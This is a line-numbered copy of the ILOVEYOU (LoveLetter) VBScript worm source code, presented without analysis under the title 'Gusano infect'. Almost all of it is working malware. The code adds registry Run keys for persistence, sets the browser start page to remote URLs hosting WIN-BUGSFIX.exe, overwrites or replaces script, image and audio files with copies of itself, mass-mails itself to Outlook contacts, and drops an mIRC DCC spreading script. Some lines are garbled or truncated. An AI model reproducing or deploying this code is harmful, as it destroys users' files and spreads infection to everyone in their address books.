Gusano infect

1. filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
2.  
3. rem barok -loveletter(vbe) <i hate go to school>
4. rem by: spyder / = ispyder {AT} mail.com / {AT} GRAMMERSoft Group /
5. Manila,Philippines
6. On Error Resume Next
7. dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
8. eq=""
9. ctr=0
10. Set fso = CreateObject("Scripting.FileSystemObject")
11. set file = fso.OpenTextFile(WScript.ScriptFullname,1)
12. vbscopy=file.ReadAll
13. main()
14. sub main()
15. On Error Resume Next
16. dim wscr,rr
17. set wscr=CreateObject("WScript.Shell")
18. rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
19. Host\Settings\Timeout")
20. if (rr>=1) then
21. wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
22. Host\Settings\Timeout",0,"REG_DWORD"
23. end if
24. Set dirwin = fso.GetSpecialFolder(0)
25. Set dirsystem = fso.GetSpecialFolder(1)
26. Set dirtemp = fso.GetSpecialFolder(2)
27. Set c = fso.GetFile(WScript.ScriptFullName)
28. c.Copy(dirsystem&"\MSKernel32.vbs")
29. c.Copy(dirwin&"\Win32DLL.vbs")
30. c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
31. regruns()
32. html()
33. spreadtoemail()
34. listadriv()
35. end sub
36. sub regruns()
37. On Error Resume Next
38. Dim num,downread
39. regcreate
40. "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
41.  
42. regcreate
43. "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DL​L",dirwin&"\Win32DLL.vbs"
44.  
45. downread=""
46. downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
47. Directory")
48. if (downread="") then
49. downread="c:\"
50. end if
51. if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
52. Randomize
53. num = Int((4 * Rnd) + 1)
54. if num = 1 then
55. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
56. Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe";
57.  
58. elseif num = 2 then
59. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
60. Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe";
61.  
62. elseif num = 3 then
63. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
64. Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe";
65.  
66. elseif num = 4 then
67. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
68. Page","
69. http://www.skyinet.net/~chu/sdgfhjks...IN-BUGSFIX.exe
70.  
71. "
72.  
73. end if
74. end if
75. if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
76. regcreate
77. "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
78.  
79. regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
80. Page","about:blank"
81. end if
82. end sub
83. sub listadriv
84. On Error Resume Next
85. Dim d,dc,s
86. Set dc = fso.Drives
87. For Each d in dc
88. If d.DriveType = 2 or d.DriveType=3 Then
89. folderlist(d.path&"\")
90. end if
91. Next
92. listadriv = s
93. end sub
94. sub infectfiles(folderspec)
95. On Error Resume Next
96. dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
97. set f = fso.GetFolder(folderspec)
98. set fc = f.Files
99. for each f1 in fc
100. ext=fso.GetExtensionName(f1.path)
101. ext=lcase(ext)
102. s=lcase(f1.name)
103. if (ext="vbs") or (ext="vbe") then
104. set ap=fso.OpenTextFile(f1.path,2,true)
105. ap.write vbscopy
106. ap.close
107. elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or
108. (ext="hta") then
109. set ap=fso.OpenTextFile(f1.path,2,true)
110. ap.write vbscopy
111. ap.close
112. bname=fso.GetBaseName(f1.path)
113. set cop=fso.GetFile(f1.path)
114. cop.copy(folderspec&"\"&bname&".vbs")
115. fso.DeleteFile(f1.path)
116. elseif(ext="jpg") or (ext="jpeg") then
117. set ap=fso.OpenTextFile(f1.path,2,true)
118. ap.write vbscopy
119. ap.close
120. set cop=fso.GetFile(f1.path)
121. cop.copy(f1.path&".vbs")
122. fso.DeleteFile(f1.path)
123. elseif(ext="mp3") or (ext="mp2") then
124. set mp3=fso.CreateTextFile(f1.path&".vbs")
125. mp3.write vbscopy
126. mp3.close
127. set att=fso.GetFile(f1.path)
128. att.attributes=att.attributes+2
129. end if
130. if (eq<>folderspec) then
131. if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or
132.  
133. (s="mirc.hlp") then
134. set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
135. scriptini.WriteLine "[script]"
136. scriptini.WriteLine ";mIRC Script"
137. scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if
138. mIRC will"
139. scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
140. correctly. thanks"
141. scriptini.WriteLine ";"
142. scriptini.WriteLine ";Khaled Mardam-Bey"
143. scriptini.WriteLine ";http://www.mirc.com";
144. scriptini.WriteLine ";"
145. scriptini.WriteLine "n0=on 1:JOIN:#:{"
146. scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
147. scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
148.  
149. scriptini.WriteLine "n3=}"
150. scriptini.close
151. eq=folderspec
152. end if
153. end if
154. next
155. end sub
156. sub folderlist(folderspec)
157. On Error Resume Next
158. dim f,f1,sf
159. set f = fso.GetFolder(folderspec)
160. set sf = f.SubFolders
161. for each f1 in sf
162. infectfiles(f1.path)
163. folderlist(f1.path)
164. next
165. end sub
166. sub regcreate(regkey,regvalue)
167. Set regedit = CreateObject("WScript.Shell")
168. regedit.RegWrite regkey,regvalue
169. end sub
170. function regget(value)
171. Set regedit = CreateObject("WScript.Shell")
172. regget=regedit.RegRead(value)
173. end function
174. function fileexist(filespec)
175. On Error Resume Next
176. dim msg
177. if (fso.FileExists(filespec)) Then
178. msg = 0
179. else
180. msg = 1
181. end if
182. fileexist = msg
183. end function
184. function folderexist(folderspec)
185. On Error Resume Next
186. dim msg
187. if (fso.GetFolderExists(folderspec)) then
188. msg = 0
189. else
190. msg = 1
191. end if
192. fileexist = msg
193. end function
194. sub spreadtoemail()
195. On Error Resume Next
196. dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
197. set regedit=CreateObject("WScript.Shell")
198. set out=WScript.CreateObject("Outlook.Application")
199. set mapi=out.GetNameSpace("MAPI")
200. for ctrlists=1 to mapi.AddressLists.Count
201. set a=mapi.AddressLists(ctrlists)
202. x=1
203. regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
204. if (regv="") then
205. regv=1
206. end if
207. if (int(a.AddressEntries.Count)>int(regv)) then
208. for ctrentries=1 to a.AddressEntries.Count
209. malead=a.AddressEntries(x)
210. regad=""
211. regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
212. if (regad="") then
213. set male=out.CreateItem(0)
214. male.Recipients.Add(malead)
215. male.Subject = "ILOVEYOU"
216. male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
217. male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
218. male.Send
219. regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
220.  
221. end if
222. x=x+1
223. next
224. regedit.RegWrite
225. "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
226. else
227. regedit.RegWrite
228. "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
229. end if
230. next
231. Set out=Nothing
232. Set mapi=Nothing
233. end sub
234. sub html
235. On Error Resume Next
236. dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
237. dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME= {AT} - {AT} Generator {AT} - {AT}
238. CONTENT= {AT} - {AT} BAROK VBS - LOVELETTER {AT} - {AT} >"&vbcrlf& _
239. "<META NAME= {AT} - {AT} Author {AT} - {AT} CONTENT= {AT} - {AT} spyder ?-? ispyder {AT} mail.com ?-? {AT} GRAMMERSoft
240. Group ?-? Manila, Philippines ?-? March 2000 {AT} - {AT} >"&vbcrlf& _
241. "<META NAME= {AT} - {AT} Description {AT} - {AT} CONTENT= {AT} - {AT} simple but i think this is
242. good... {AT} - {AT} >"&vbcrlf& _
243. "<?-?HEAD><BODY
244. ONMOUSEOUT= {AT} - {AT} window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#) {AT} - {AT}
245.  
246. "&vbcrlf& _
247. "ONKEYDOWN= {AT} - {AT} window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#) {AT} - {AT}
248.  
249. BGPROPERTIES= {AT} - {AT} fixed {AT} - {AT} BGCOLOR= {AT} - {AT} #FF9933 {AT} - {AT} >"&vbcrlf& _
250. "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this
251. HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
252. "<?-?CENTER><MARQUEE LOOP= {AT} - {AT} infinite {AT} - {AT}
253. BGCOLOR= {AT} - {AT} yellow {AT} - {AT} >----------z--------------------z----------<?-?MARQUEE>
254. "&vbcrlf& _
255. "<?-?BODY><?-?HTML>"&vbcrlf& _
256. "<SCRIPT language= {AT} - {AT} JScript {AT} - {AT} >"&vbcrlf& _
257. "<!--?-??-?"&vbcrlf& _
258. "if (window.screen){var wi=screen.availWidth;var
259. hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
260. "?-??-?-->"&vbcrlf& _
261. "<?-?SCRIPT>"&vbcrlf& _
262. "<SCRIPT LANGUAGE= {AT} - {AT} VBScript {AT} - {AT} >"&vbcrlf& _
263. "<!--"&vbcrlf& _
264. "on error resume next"&vbcrlf& _
265. "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
266. "aw=1"&vbcrlf& _
267. "code="
268. dta2="set fso=CreateObject( {AT} - {AT} Scripting.FileSystemObject {AT} - {AT} )"&vbcrlf& _
269. "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
270. "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
271. "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
272. "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
273. "set wri=fso.CreateTextFile(dirsystem& {AT} - {AT} ^-^MSKernel32.vbs {AT} - {AT} )"&vbcrlf& _
274. "wri.write code4"&vbcrlf& _
275. "wri.close"&vbcrlf& _
276. "if (fso.FileExists(dirsystem& {AT} - {AT} ^-^MSKernel32.vbs {AT} - {AT} )) then"&vbcrlf& _
277. "if (err.number=424) then"&vbcrlf& _
278. "aw=0"&vbcrlf& _
279. "end if"&vbcrlf& _
280. "if (aw=1) then"&vbcrlf& _
281. "document.write {AT} - {AT} ERROR: can#-#t initialize ActiveX {AT} - {AT} "&vbcrlf& _
282. "window.close"&vbcrlf& _
283. "end if"&vbcrlf& _
284. "end if"&vbcrlf& _
285. "Set regedit = CreateObject( {AT} - {AT} WScript.Shell {AT} - {AT} )"&vbcrlf& _
286. "regedit.RegWrite
287. {AT} - {AT} HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32 {AT} - {AT} ,dirsystem& {AT} - {AT} ^-^MSKernel32.vbs {AT} - {AT} "&vbcrlf&
288.  
289. _
290. "?-??-?-->"&vbcrlf& _
291. "<?-?SCRIPT>"
292. dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
293. dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
294. dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
295. dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
296. dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
297. dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
298. dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
299. dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
300. set fso=CreateObject("Scripting.FileSystemObject")
301. set c=fso.OpenTextFile(WScript.ScriptFullName,1)
302. lines=Split(c.ReadAll,vbcrlf)
303. l1=ubound(lines)
304. for n=0 to ubound(lines)
305. lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
306. lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
307. lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
308. if (l1=n) then
309. lines(n)=chr(34)+lines(n)+chr(34)
310. else
311. lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
312. end if
313. next
314. set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
315. b.close
316. set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
317. d.write dt5
318. d.write join(lines,vbcrlf)
319. d.write vbcrlf
320. d.write dt6
321. d.close
322. end sub